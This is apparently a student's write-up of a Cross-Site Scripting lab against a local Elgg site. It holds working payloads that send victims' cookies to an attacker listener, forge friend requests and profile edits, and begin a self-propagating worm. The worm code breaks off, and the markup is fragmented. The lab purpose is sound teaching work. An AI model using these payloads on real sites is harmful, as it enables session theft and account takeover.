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19" w:dyaOrig="2174">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000000" style="width:210.950000pt;height:108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                                    Assignment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Information Security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Name Zaid Ali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BSCS-18-57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7 th semester morning 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4472C4"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="4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472C4"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="44"/>
          <w:u w:val="single"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting Attack Lab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4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</w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="3116"/>
        <w:gridCol w:w="3117"/>
        <w:gridCol w:w="3117"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="311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7"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="311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7"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="311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7"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="311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7"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross Site Scripting Attack Lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="311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7"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">Zaid Ali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="311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7"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">11-11-2021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7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4472C4"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="48"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pP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48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48"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="0" w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/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attacker: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10.0.2.15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="0" w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/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server: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10.0.2.4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Edit the DNS record in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/etc/hosts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on the attacker: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10.0.2.4       </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId2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www.xsslabelgg.com</w:t>
        </w:r>
      </w:hyperlink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Read the file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/etc/apache2/sites-available/000-default.conf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&lt;VirtualHost *:80&gt;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  ServerName </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId3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http://www.xsslabelgg.com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  DocumentRoot /var/www/XSS/Elgg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&lt;/VirtualHost&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259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</w:pPr>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId4">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
            <w:color w:val="24292F"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="22"/>
            <w:u w:val="single"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.xsslabelgg.com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 DocumentRoot /var/www/XSS/Elgg " tabindex="0" role="button"&gt;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It shows that the sources of website </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId5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http://www.xsslabelgg.com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are hosted in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/var/www/XSS/Elgg</w:t>
      </w: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48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48"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 1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For Firefox,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Web Developer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-&gt;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Network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is also useful.</w:t>
      </w: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36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36"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 1.1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Log in with account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alice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and password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seedalice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, then edit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Brief description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module in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Profile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as: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&lt;script&gt;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alert("XSS");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&lt;/script&gt;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And save it.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Now, access </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.xsslabelgg.com/profile/alice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from either the server or the attacker, an alert prompts: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object w:dxaOrig="8985" w:dyaOrig="7167">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000001" style="width:449.250000pt;height:358.3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7"/>
        </w:object>
      </w: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48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48"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 2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Edit the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Brief description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module and save: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&lt;script&gt;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alert(document.cookie);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&lt;/script&gt;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When accessing the profile page, it will show the cookie of the log-in user.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When Boby opens the page, it will be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object w:dxaOrig="8985" w:dyaOrig="7198">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000002" style="width:449.250000pt;height:359.9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9"/>
        </w:objec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For Alice herself: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object w:dxaOrig="8985" w:dyaOrig="7198">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000003" style="width:449.250000pt;height:359.9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1"/>
        </w:object>
      </w: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48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48"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 3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Edit the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Brief description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as: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&lt;script&gt;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document.write(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"&lt;img src=http://10.0.2.15:5555?c=" + escape(document.cookie) + " &gt;"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&lt;/script&gt;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It will send an HTTP GET request to the port 5555 on the attacker with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document.cookie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whenever the profile page is accessed by any victim user.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Then listen on the port 5555 on the attacker machine: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nc -l 5555 -v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Once visiting the profile page ( </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId13">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.xsslabelgg.com/profile/alice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) from VM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10.0.2.4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, then it will appear on the attacker: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object w:dxaOrig="8985" w:dyaOrig="6578">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000004" style="width:449.250000pt;height:328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4"/>
        </w:object>
      </w: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48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48"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 4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Try to log in as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alice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and add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samy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as a friend, during the process,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network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tool captures the request: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HTTP header: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Request URL: </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId16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http://www.xsslabelgg.com/action/friends/add?friend=47&amp;__elgg_ts=1589608177&amp;__elgg_token=VSvUwjnd17FwcB4BXzuRzQ&amp;__elgg_ts=1589608177&amp;__elgg_token=VSvUwjnd17FwcB4BXzuRzQ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GET /action/friends/add?friend=47&amp;__elgg_ts=1589608177&amp;__elgg_token=VSvUwjnd17FwcB4BXzuRzQ&amp;__elgg_ts=1589608177&amp;__elgg_token=VSvUwjnd17FwcB4BXzuRzQ HTTP/1.1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Host: </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId17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www.xsslabelgg.com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User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0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Accept: application/json, text/javascript, */*; q=0.01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Accept-Language: en-US,en;q=0.5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Accept-Encoding: gzip, deflate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Referer: </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId18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http://www.xsslabelgg.com/profile/samy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X-Requested-With: XMLHttpRequest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Cookie: Elgg=5tqs9f0im6vp35cr2cva0lpvp4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Connection: keep-alive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So construct the payload that forges the user's friend request as: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&lt;script type="text/javascript"&gt;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window.onload = function ()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Ajax = null;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ts = "&amp;__elgg_ts=" + elgg.security.token.__elgg_ts;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token = "&amp;__elgg_token=" + elgg.security.token.__elgg_token;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//Construct the HTTP request to add Samy as a friend.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sendurl =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"</w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId19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http://www.xsslabelgg.com/action/friends/add?friend=47</w:t>
        </w:r>
      </w:hyperlink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" + ts + token; //FILL IN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//Create and send Ajax request to add friend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Ajax = new XMLHttpRequest();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Ajax.open("GET", sendurl, true);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Ajax.setRequestHeader("Host", "</w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId20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www.xsslabelgg.com</w:t>
        </w:r>
      </w:hyperlink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");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Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");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Ajax.send();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};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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259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</w:pPr>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId21">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
            <w:color w:val="24292F"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="22"/>
            <w:u w:val="single"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.xsslabelgg.com/action/friends/add?friend=47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" + ts + token; //FILL IN //Create and send Ajax request to add friend Ajax = new XMLHttpRequest(); Ajax.open("GET", sendurl, true); Ajax.setRequestHeader("Host", "</w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId22">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="22"/>
            <w:u w:val="single"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">www.xsslabelgg.com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"); Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); Ajax.send(); }; &lt;/script&gt; " tabindex="0" role="button"&gt;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Log in with username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samy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and password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seedsamy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Add the code above in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Profile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-&gt;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About me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by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edit html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mode.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Now on the VM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10.0.2.4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, sign in as Boby and visit Samy's profile(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">http://www.xsslabelgg.com/profile/samy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), without any extra action, just refresh the page, it shows that Samy is already your (i.e. Boby) friend.</w:t>
      </w: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48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48"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 5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When editing a user's (Alice) own profile legally, the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network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tool captures such an HTTP POST request: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Request URL: </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId23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http://www.xsslabelgg.com/action/profile/edit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__elgg_token=VSvHyrizEfLuFJUoNPOQXg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__elgg_ts=1589672946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name=Alice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description=&lt;p&gt;dsadsa&lt;/p&gt;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accesslevel[description]=2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briefdescription=dasasda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accesslevel[briefdescription]=2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location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accesslevel[location]=2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interests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accesslevel[interests]=2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skills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accesslevel[skills]=2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contactemail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accesslevel[contactemail]=2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phone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accesslevel[phone]=2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mobile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accesslevel[mobile]=2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website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accesslevel[website]=2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twitter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accesslevel[twitter]=2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guid=44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POST /action/profile/edit HTTP/1.1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Host: </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId24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www.xsslabelgg.com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User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8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Accept-Language: en-US,en;q=0.5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Accept-Encoding: gzip, deflate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Referer: </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId25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http://www.xsslabelgg.com/profile/alice/edit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Content-Type: application/x-www-form-urlencoded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Content-Length: 505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Cookie: Elgg=ruji2rg6eu80rqj6oebqt57ga7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Connection: keep-alive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Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259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</w:pPr>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId26">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
            <w:color w:val="24292F"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="22"/>
            <w:u w:val="single"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">www.xsslabelgg.com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 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId27">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="22"/>
            <w:u w:val="single"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.xsslabelgg.com/profile/alice/edit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 Content-Type: application/x-www-form-urlencoded Content-Length: 505 Cookie: Elgg=ruji2rg6eu80rqj6oebqt57ga7 Connection: keep-alive Upgrade-Insecure-Requests: 1 " tabindex="0" role="button"&gt;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Then edit Samy's profile and figure out his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guid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as 47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object w:dxaOrig="8985" w:dyaOrig="4469">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000005" style="width:449.250000pt;height:223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28"/>
        </w:objec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Now we want to modify the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about me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module in the profile of someone as </w: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"modified by Samy"</w:t>
      </w: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if he/she visits Samy's profile page. Save the code below as Samy's profile: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&lt;script type="text/javascript"&gt;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window.onload = function ()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//JavaScript code to access user name, user guid, Time Stamp __elgg_ts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//and Security Token __elgg_token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userName = "&amp;name=" + elgg.session.user.name;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guid = "&amp;guid=" + elgg.session.user.guid;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ts = "&amp;__elgg_ts=" + elgg.security.token.__elgg_ts;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token = "&amp;__elgg_token=" + elgg.security.token.__elgg_token;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description =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"&amp;description=&lt;p&gt;modified by Samy&lt;p&gt;" + "&amp;accesslevel[description]=2";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//Construct the content of your url.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sendurl = "</w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId30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http://www.xsslabelgg.com/action/profile/edit</w:t>
        </w:r>
      </w:hyperlink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";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content = userName + guid + ts + token + description;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samyGuid = 47;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if (elgg.session.user.guid != samyGuid)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//Create and send Ajax request to modify profile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var Ajax = null;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Ajax = new XMLHttpRequest();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Ajax.open("POST", sendurl, true);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Ajax.setRequestHeader("Host", "</w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId31">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
            <w:color w:val="24292F"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">www.xsslabelgg.com</w:t>
        </w:r>
      </w:hyperlink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");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Ajax.setRequestHeader(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  "Content-Type",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  "application/x-www-form-urlencoded"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  Ajax.send(content);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}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};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object w:dxaOrig="8985" w:dyaOrig="6077">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000006" style="width:449.250000pt;height:303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32"/>
        </w:object>
      </w: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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259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</w:pPr>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId34">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
            <w:color w:val="24292F"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="22"/>
            <w:u w:val="single"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.xsslabelgg.com/action/profile/edit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"; var content = userName + guid + ts + token + description; var samyGuid = 47; if (elgg.session.user.guid != samyGuid) { //Create and send Ajax request to modify profile var Ajax = null; Ajax = new XMLHttpRequest(); Ajax.open("POST", sendurl, true); Ajax.setRequestHeader("Host", "</w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId35">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="22"/>
            <w:u w:val="single"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">www.xsslabelgg.com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"); Ajax.setRequestHeader( "Content-Type", "application/x-www-form-urlencoded" ); Ajax.send(content); } }; &lt;/script&gt; " tabindex="0" role="button"&gt;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Then, visit Samy's profile using Boby's account. Boby's profile is modified at once:</w:t>
      </w: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48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48"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 6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To make the code in </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId36">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">Task 5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self-propogating:</w:t>
      </w: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4BACC6"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="36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36"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">DOM Approach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Do some subtle modification based on the code in </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId37">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">Task 5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&lt;script type="text/javascript" id="worm"&gt;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window.onload = function ()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headerTag = '&lt;script id="worm" type="text/javascript"&gt;';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jsCode = document.getElementById("worm").innerHTML;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tailTag = "&lt;/" + "script&gt;";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var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);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//JavaScript code to access user name, user guid, Time Stamp __elgg_ts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//and Security Token __elgg_token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class="pl-k"&gt;var&lt;/span&gt; &lt;span class="pl-s1"&gt;userName&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s"&gt;"&amp;amp;name="&lt;/span&gt; &lt;span class="pl-c1"&gt;+&lt;/span&gt; &lt;span class="pl-s1"&gt;elgg&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;session&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;user&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;name&lt;/span&gt;&lt;span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class="pl-k"&gt;var&lt;/span&gt; &lt;span class="pl-s1"&gt;guid&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s"&gt;"&amp;amp;guid="&lt;/span&gt; &lt;span class="pl-c1"&gt;+&lt;/span&gt; &lt;span class="pl-s1"&gt;elgg&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;session&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;user&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;guid&lt;/span&gt;&lt;span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class="pl-k"&gt;var&lt;/span&gt; &lt;span class="pl-s1"&gt;ts&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s"&gt;"&amp;amp;__elgg_ts="&lt;/span&gt; &lt;span class="pl-c1"&gt;+&lt;/span&gt; &lt;span class="pl-s1"&gt;elgg&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;security&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;token&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;__elgg_ts&lt;/span&gt;&lt;span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class="pl-k"&gt;var&lt;/span&gt; &lt;span class="pl-s1"&gt;token&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s"&gt;"&amp;amp;__elgg_token="&lt;/span&gt; &lt;span class="pl-c1"&gt;+&lt;/span&gt; &lt;span class="pl-s1"&gt;elgg&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;security&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;token&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;__elgg_token&lt;/span&gt;&lt;span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class="pl-k"&gt;var&lt;/span&gt; &lt;span class="pl-s1"&gt;description&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt;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class="pl-s"&gt;"&amp;amp;description=&amp;lt;p&amp;gt;modified by Samy&amp;lt;p&amp;gt;"&lt;/span&gt; &lt;span class="pl-c1"&gt;+&lt;/span&gt;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class="pl-s1"&gt;wormCode&lt;/span&gt; &lt;span class="pl-c1"&gt;+&lt;/span&gt;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class="pl-s"&gt;"&amp;amp;accesslevel[description]=2"&lt;/span&gt;&lt;span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class="pl-c"&gt;//Construct the content of your url.&lt;/span&gt;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class="pl-k"&gt;var&lt;/span&gt; &lt;span class="pl-s1"&gt;sendurl&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s"&gt;"http://www.xsslabelgg.com/action/profile/edit"&lt;/span&gt;&lt;span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class="pl-k"&gt;var&lt;/span&gt; &lt;span class="pl-s1"&gt;content&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s1"&gt;userName&lt;/span&gt; &lt;span class="pl-c1"&gt;+&lt;/span&gt; &lt;span class="pl-s1"&gt;guid&lt;/span&gt; &lt;span class="pl-c1"&gt;+&lt;/span&gt; &lt;span class="pl-s1"&gt;ts&lt;/span&gt; &lt;span class="pl-c1"&gt;+&lt;/span&gt; &lt;span class="pl-s1"&gt;token&lt;/span&gt; &lt;span class="pl-c1"&gt;+&lt;/span&gt; &lt;span class="pl-s1"&gt;description&lt;/span&gt;&lt;span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class="pl-k"&gt;var&lt;/span&gt; &lt;span class="pl-s1"&gt;samyGuid&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-c1"&gt;47&lt;/span&gt;&lt;span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class="pl-k"&gt;if&lt;/span&gt; &lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;elgg&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;session&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;user&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;guid&lt;/span&gt; &lt;span class="pl-c1"&gt;!=&lt;/span&gt; &lt;span class="pl-s1"&gt;samyGuid&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;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class="pl-c"&gt;//Create and send Ajax request to modify profile&lt;/span&gt;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class="pl-k"&gt;var&lt;/span&gt; &lt;span class="pl-v"&gt;Ajax&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-c1"&gt;null&lt;/span&gt;&lt;span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class="pl-v"&gt;Ajax&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-k"&gt;new&lt;/span&gt; &lt;span class="pl-v"&gt;XMLHttpRequest&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span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class="pl-v"&gt;Ajax&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;open&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s"&gt;"POST"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt; &lt;span class="pl-s1"&gt;sendurl&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt; &lt;span class="pl-c1"&gt;true&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span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class="pl-v"&gt;Ajax&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;setRequestHeader&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span 